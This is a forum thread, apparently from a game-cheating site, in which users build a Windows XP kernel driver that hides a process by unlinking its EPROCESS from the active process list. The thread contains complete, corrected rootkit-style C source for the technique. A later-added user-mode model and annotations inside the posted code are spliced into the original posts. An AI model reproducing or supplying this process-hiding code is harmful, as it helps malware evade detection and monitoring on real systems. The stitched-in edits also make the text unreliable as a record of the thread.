Stylo Grandmaster Cheater Supreme Reputation: 3
Joined: 16 May 2007 Posts: 1073 Location: Israel
Posted: Fri Apr 08, 2011 8:29 am Post subject: DKOM Question ( EPROCESS Access )
Hi,
Recently I have started reading about DKOM.
I tried accessing the EPROCESS structure to obtain the LIST_ENTRY for the next and previous EPROCESS,
so I could link the previous process to its next one for hiding the process.
After a lot of BSODs I gave up and decided to ask someone that has already done it.
When I'm writing this:
Code: |
NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath ) {
    PEPROCESS process;
    PLIST_ENTRY list_active_procs;
    process = PsGetCurrentProcess();
    // EPROCESS is an opaque (incomplete) type in ntddk.h, so pointer arithmetic on
    // PEPROCESS does not compile: the compiler cannot scale the offset by sizeof(EPROCESS)
    list_active_procs = (PLIST_ENTRY)( process + 0x88 /* offset */ );
}
|
I get a compilation error that says unknown size for EPROCESS,
so when I try to access it through inline asm
I get the BSOD after I access the Flink member of LIST_ENTRY.
Anyone have an idea?
_________________
Stylo
Innovation Grandmaster Cheater Reputation: 12
Joined: 14 Aug 2008 Posts: 617
Posted: Fri Apr 08, 2011 2:43 pm
The offset to the ActiveProcessLinks member of the EPROCESS structure may change between versions of Windows. Windows XP uses 0x88, while Windows Vista and Windows 7 use 0xA0 and 0xB8, respectively. Also, you should cast the pointer to the EPROCESS structure to an integer of some kind.
Stylo Grandmaster Cheater Supreme Reputation: 3
Joined: 16 May 2007 Posts: 1073 Location: Israel
Posted: Sat Apr 09, 2011 1:27 am
Can you take a look at what I'm doing here?
Code: |
#include <ntddk.h>
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) {
    DbgPrint( "Driver Unloaded!" );
}
NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath ) {
    PEPROCESS process;
    INT i_process, count = 0, currentProcessId, Addr;
    PLIST_ENTRY list_active_procs;
    pDriverObject->DriverUnload = OnUnload;
    DbgPrint( "Driver Loaded!" );
    // EPROCESS for the current process
    process = PsGetCurrentProcess();
    while( count ++ < 10 ) {
        // Casting EPROCESS to INT
        i_process = (INT)process;
        // Print EPROCESS Address
        DbgPrint( "EPROCESS Address = %x", i_process );
        // Get the process id from eprocess and print it
        currentProcessId = *(INT*)(i_process + 0x84 /* UniqueProcessId offset for win. xp sp3 */ );
        DbgPrint( "Current Process Id = %d", currentProcessId );
        // Get the LIST_ENTRY from the current EPROCESS
        // (this dereferences the entry, so Addr holds Flink, i.e. the address of the NEXT
        // process's LIST_ENTRY, not the address of this process's LIST_ENTRY)
        Addr = *(INT*)(i_process + 0x88 /* ActiveProcessList offset for win. xp sp3 */ );
        list_active_procs = (PLIST_ENTRY)Addr;
        // Get the next EPROCESS (Flink)
        // (Flink is a LIST_ENTRY address, not an EPROCESS address; without subtracting the
        // 0x88 offset the walk drifts through the wrong memory)
        process = (PEPROCESS) list_active_procs->Flink;
    }
    return STATUS_SUCCESS;
}
|
I'm trying to get the first 10 EPROCESSes after the current EPROCESS,
but I always get a BSOD.
For the first EPROCESS structure's process id I always get 4,
so I guess this is the System process.
_________________
Stylo
Innovation Grandmaster Cheater Reputation: 12
Joined: 14 Aug 2008 Posts: 617
Posted: Sat Apr 09, 2011 8:45 am
The current process will always be the System process unless the driver's execution of the code was caused by an IOCTL, so you're essentially using PsActiveProcessHead. And, as the definition of LIST_ENTRY dictates, Flink points to the next Flink, not the next EPROCESS.
I was unable to test the following code, but hopefully it will work. Keep in mind that ActiveProcessList is a circular doubly-linked list, so if there are less than ten processes, it will wrap back around.
Code: |
#include <ntddk.h>
VOID Unload(__in PDRIVER_OBJECT pDriverObject)
{
    UNREFERENCED_PARAMETER(pDriverObject);
    DbgPrint("Driver Unloaded!");
}
NTSTATUS DriverEntry(__in PDRIVER_OBJECT pDriverObject, __in PUNICODE_STRING pRegistryPath)
{
    // the WDK compiles .c files as C89: declarations first, no "for (int ...)"
    PEPROCESS pProcess;
    PLIST_ENTRY pActiveProcessLinks;
    int nProcessIdentifier;
    int nCount;
    UNREFERENCED_PARAMETER(pRegistryPath);
    pDriverObject->DriverUnload = Unload;
    DbgPrint("Driver Loaded!");
    pProcess = PsGetCurrentProcess();
    for (nCount = 0; nCount < 10; ++nCount)
    {
        DbgPrint("EPROCESS Address = %p", pProcess);
        // byte offsets are applied to an integer (DWORD_PTR), never to PEPROCESS itself
        nProcessIdentifier = *(int *)((DWORD_PTR)pProcess + 0x84);
        DbgPrint("Process Identifier = %d", nProcessIdentifier);
        pActiveProcessLinks = (PLIST_ENTRY)((DWORD_PTR)pProcess + 0x88);
        // Flink is the next entry's LIST_ENTRY; back up 0x88 to the EPROCESS that contains it
        pProcess = (PEPROCESS)((DWORD_PTR)pActiveProcessLinks->Flink - 0x88);
    }
    return STATUS_SUCCESS;
}
|
Stylo Grandmaster Cheater Supreme Reputation: 3
Joined: 16 May 2007 Posts: 1073 Location: Israel
Posted: Sat Apr 09, 2011 9:44 am
Innovation wrote: | The current process will always be the System process unless the driver's execution of the code was caused by an IOCTL, so you're essentially using PsActiveProcessHead. And, as the definition of LIST_ENTRY dictates, Flink points to the next Flink, not the next EPROCESS.
I was unable to test the following code, but hopefully it will work. Keep in mind that ActiveProcessList is a circular doubly-linked list, so if there are less than ten processes, it will wrap back around. |
Yeah, you were right about that,
and I finally managed to hide a process properly.
Here's the full code for it:
Code: |
#include <ntddk.h>
#define PROCESS_TO_HIDE 1234 // Process Id to hide
#define EPROCESS_OFFSET_PID 0x84         // UniqueProcessId, Windows XP SP3 x86
#define EPROCESS_OFFSET_ACTIVEPROCS 0x88 // ActiveProcessLinks, Windows XP SP3 x86
// Walks ActiveProcessLinks once around the ring, starting at the current process.
// Returns 0 if no process has the requested id; the ring is circular, so without the
// "back at the start" check the loop would never end for an absent id. Note that the
// ring also passes through nt!PsActiveProcessHead, which is not inside an EPROCESS.
INT GetEprocessByProcessId( INT ProcessId ) {
    PEPROCESS eProcess;
    INT iProcess, iStart, currentProcessId;
    LIST_ENTRY *list_active_procs;
    eProcess = PsGetCurrentProcess();
    iProcess = iStart = (INT)eProcess;
    do {
        currentProcessId = *(INT*)(iProcess + EPROCESS_OFFSET_PID);
        if( currentProcessId == ProcessId )
            return iProcess;
        list_active_procs = (LIST_ENTRY *)(iProcess + EPROCESS_OFFSET_ACTIVEPROCS);
        // Flink is the next entry's LIST_ENTRY, so back up to its EPROCESS
        iProcess = (INT)list_active_procs->Flink;
        iProcess -= EPROCESS_OFFSET_ACTIVEPROCS;
    } while( iProcess != iStart );
    return 0x00000000;
}
VOID HideProcess( INT iProcess ) {
    LIST_ENTRY *list_active_procs;
    list_active_procs = (LIST_ENTRY*)(iProcess + EPROCESS_OFFSET_ACTIVEPROCS);
    // previous entry's Flink = our Flink (forward walks now skip us)
    *((INT*)list_active_procs->Blink) = (INT)list_active_procs->Flink;
    // next entry's Blink = our Blink (backward walks now skip us); (INT*)Flink + 1 is &Flink->Blink.
    // The line as first posted (and quoted later in the thread) assigned Flink here, which points
    // the next entry's Blink at itself and corrupts the ring once that neighbour exits.
    *((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Blink;
    // point our own links at ourselves, so the RemoveEntryList done on process exit only touches us
    list_active_procs->Flink = (LIST_ENTRY *) &(list_active_procs->Flink);
    list_active_procs->Blink = (LIST_ENTRY *) &(list_active_procs->Flink);
}
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) {
    UNREFERENCED_PARAMETER( pDriverObject );
    DbgPrint( "Driver Unloaded!" );
}
NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath ) {
    INT iProcess;
    UNREFERENCED_PARAMETER( pRegistryPath );
    pDriverObject->DriverUnload = OnUnload;
    DbgPrint( "Driver Loaded!" );
    iProcess = GetEprocessByProcessId( PROCESS_TO_HIDE );
    if( iProcess == 0 ) {
        DbgPrint( "No process with id %d", PROCESS_TO_HIDE );
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint( "EPROCESS for %d found", PROCESS_TO_HIDE );
    DbgPrint( "Address = %x", iProcess );
    DbgPrint( "Attempting to hide %d . .", PROCESS_TO_HIDE );
    HideProcess( iProcess );
    return STATUS_SUCCESS;
}
|
Thank you for your help
_________________
Stylo
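A user-mode model of what the two posts above do, added here as an example; it is not code from the thread or from any Windows source. It builds a small circular list with the same byte offsets the thread uses for XP SP3 x86, walks it the way Innovation's reply does (Flink minus 0x88 to get back to the EPROCESS), finds a PID with a bounded lap instead of while(1), unlinks it with both neighbours repointed, and checks that forward and backward walks both skip the hidden entry. FAKE_EPROCESS, g_procs, the PIDs 368/1234/2000 and every function name are constructed for the example; the real EPROCESS is not modelled beyond the two offsets.

```c
/* Added example, not code from the thread: a user-mode model of the DKOM unlink.
 * FAKE_EPROCESS is an assumed layout that only places UniqueProcessId and
 * ActiveProcessLinks at the thread's XP SP3 x86 offsets (0x84 and 0x88). */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define EPROCESS_OFFSET_PID         0x84 /* UniqueProcessId,   from the thread */
#define EPROCESS_OFFSET_ACTIVEPROCS 0x88 /* ActiveProcessLinks, from the thread */

typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY;

typedef struct _FAKE_EPROCESS {          /* assumed stand-in, nothing else modelled */
    uint8_t    Pcb[EPROCESS_OFFSET_PID]; /* KPROCESS etc.: opaque padding here */
    uint32_t   UniqueProcessId;          /* lands at 0x84 */
    LIST_ENTRY ActiveProcessLinks;       /* lands at 0x88 */
} FAKE_EPROCESS;
/* compile-time check that the padding really puts both fields on those offsets */
typedef char check_pid_off[offsetof(FAKE_EPROCESS, UniqueProcessId) == EPROCESS_OFFSET_PID ? 1 : -1];
typedef char check_links_off[offsetof(FAKE_EPROCESS, ActiveProcessLinks) == EPROCESS_OFFSET_ACTIVEPROCS ? 1 : -1];

/* Stand-in for nt!PsActiveProcessHead: a bare LIST_ENTRY inside no EPROCESS. */
static LIST_ENTRY PsActiveProcessHead;
/* Constructed process table: System (4) plus three made-up PIDs. */
static FAKE_EPROCESS g_procs[4];
static const uint32_t g_pids[4] = { 4, 368, 1234, 2000 };

static void InsertTailList(LIST_ENTRY *head, LIST_ENTRY *entry) {
    entry->Flink = head;
    entry->Blink = head->Blink;
    head->Blink->Flink = entry;
    head->Blink = entry;
}
/* Flink points at the next LIST_ENTRY; the next EPROCESS is Flink minus the offset. */
static FAKE_EPROCESS *EprocessFromLinks(LIST_ENTRY *links) {
    return (FAKE_EPROCESS *)((uint8_t *)links - EPROCESS_OFFSET_ACTIVEPROCS);
}
static LIST_ENTRY *LinksFromEprocess(FAKE_EPROCESS *p) {
    return (LIST_ENTRY *)((uint8_t *)p + EPROCESS_OFFSET_ACTIVEPROCS);
}
static uint32_t PidFromEprocess(FAKE_EPROCESS *p) {
    return *(uint32_t *)((uint8_t *)p + EPROCESS_OFFSET_PID);
}

void BuildProcessList(void) {
    size_t i;
    PsActiveProcessHead.Flink = PsActiveProcessHead.Blink = &PsActiveProcessHead;
    for (i = 0; i < 4; i++) {
        g_procs[i].UniqueProcessId = g_pids[i];
        InsertTailList(&PsActiveProcessHead, &g_procs[i].ActiveProcessLinks);
    }
}

/* One lap around the ring from 'start'. Two guards the thread's while(1) lacks:
 * stop when back at 'start' (pid absent) and never read a PID through the head. */
FAKE_EPROCESS *FindEprocessByPid(FAKE_EPROCESS *start, uint32_t pid) {
    LIST_ENTRY *first = LinksFromEprocess(start), *e = first;
    do {
        if (e != &PsActiveProcessHead && PidFromEprocess(EprocessFromLinks(e)) == pid)
            return EprocessFromLinks(e);
        e = e->Flink;
    } while (e != first);
    return NULL;
}

/* The unlink: prev->Flink = next, next->Blink = prev (not next), then make the
 * hidden entry point at itself so a RemoveEntryList on exit touches only itself. */
void HideProcess(FAKE_EPROCESS *p) {
    LIST_ENTRY *self = LinksFromEprocess(p), *prev = self->Blink, *next = self->Flink;
    prev->Flink = next;
    next->Blink = prev;
    self->Flink = self->Blink = self;
}

/* PIDs seen walking from the head by Flink (forward) or Blink (backward). */
size_t WalkList(int forward, uint32_t *out, size_t max) {
    size_t n = 0;
    LIST_ENTRY *e = forward ? PsActiveProcessHead.Flink : PsActiveProcessHead.Blink;
    while (e != &PsActiveProcessHead && n < max) {
        out[n++] = PidFromEprocess(EprocessFromLinks(e));
        e = forward ? e->Flink : e->Blink;
    }
    return n;
}

/* (INT*)Flink + 1 in the hide code is &Flink->Blink: one pointer-sized step. */
int LinkPlusOneIsBlink(LIST_ENTRY *e) {
    return (void *)((uintptr_t *)e + 1) == (void *)&e->Blink;
}

/* Hide PID 1234 starting from System and check both directions; 1 on success. */
int RunDemo(void) {
    uint32_t fwd[8], bwd[8];
    size_t nf, nb, i;
    FAKE_EPROCESS *target;
    BuildProcessList();
    if (FindEprocessByPid(&g_procs[0], 9999) != NULL) return 0; /* absent pid: lap ends */
    target = FindEprocessByPid(&g_procs[0], 1234);
    if (target != &g_procs[2]) return 0;
    HideProcess(target);
    nf = WalkList(1, fwd, 8);
    nb = WalkList(0, bwd, 8);
    if (nf != 3 || nb != 3 || fwd[0] != 4 || bwd[0] != 2000) return 0;
    for (i = 0; i < 3; i++)
        if (fwd[i] == 1234 || bwd[i] == 1234) return 0;
    if (target->ActiveProcessLinks.Flink != &target->ActiveProcessLinks) return 0;
    return g_procs[1].ActiveProcessLinks.Flink == &g_procs[3].ActiveProcessLinks &&
           g_procs[3].ActiveProcessLinks.Blink == &g_procs[1].ActiveProcessLinks;
}

int main(void) {
    printf("unlink model %s\n", RunDemo() ? "ok" : "FAILED");
    return 0;
}
```

Any C99 compiler builds it; the two check typedefs refuse to compile if the padding does not put the fields at 0x84 and 0x88, which is the same kind of mistake a wrong per-version offset produces in a real driver. The list-head guard matters in the kernel too: nt!PsActiveProcessHead sits in the same ring but inside no EPROCESS, so a PID read through it is whatever happens to precede the head in ntoskrnl's data.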
brunojex How do I cheat? Reputation: 0
Joined: 30 Jan 2013 Posts: 5
Posted: Tue Jul 09, 2013 10:53 pm
Code: | *((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink; |
I pretty much get everything but this line; I can't figure out why it is Flink + 1 and not just Flink.
Can anyone explain?
Innovation Grandmaster Cheater Reputation: 12
Joined: 14 Aug 2008 Posts: 617
Posted: Wed Jul 10, 2013 1:58 am
brunojex wrote: | *((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;
I pretty much get everything but this line; I can't figure out why it is Flink + 1 and not just Flink.
Can anyone explain? |
It's the same thing (assuming sizeof(LIST_ENTRY *) == sizeof(int *) == sizeof(int)) as:
Code: | list_active_procs->Flink->Blink = list_active_procs->Flink; |
See pointer arithmetic.
It was for this reason that I said to cast the pointer to the EPROCESS structure to an integer when dealing with byte offsets, else it will increment in multiples of sizeof(EPROCESS), which was not what was desired. The size of EPROCESS is unknown anyway, and that's why Stylo had compilation errors initially. DWORD_PTR is an integer Windows data type created specifically for this sort of scenario and what I used in my example code.
brunojex How do I cheat? Reputation: 0
Joined: 30 Jan 2013 Posts: 5
Posted: Wed Jul 10, 2013 8:32 pm
Ah, I was reading it wrong, actually.
Code: | *((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink; |
This is changing the forward process's Blink field.
Code: | *((INT*)list_active_procs->Blink) = (INT)list_active_procs->Flink; |
And this is changing the rearward process's Flink field.
I was thinking of it the other way around, that's why I got confused. My mistake...
Anyway, thanks for the reply, it helped me figure out I was mistaken.
So a pointer + 1 will always be sizeof(pointer) bytes from the original pointer,
but if it isn't a pointer but a DWORD + 1, for example, it will only be 1 byte from the original address, right?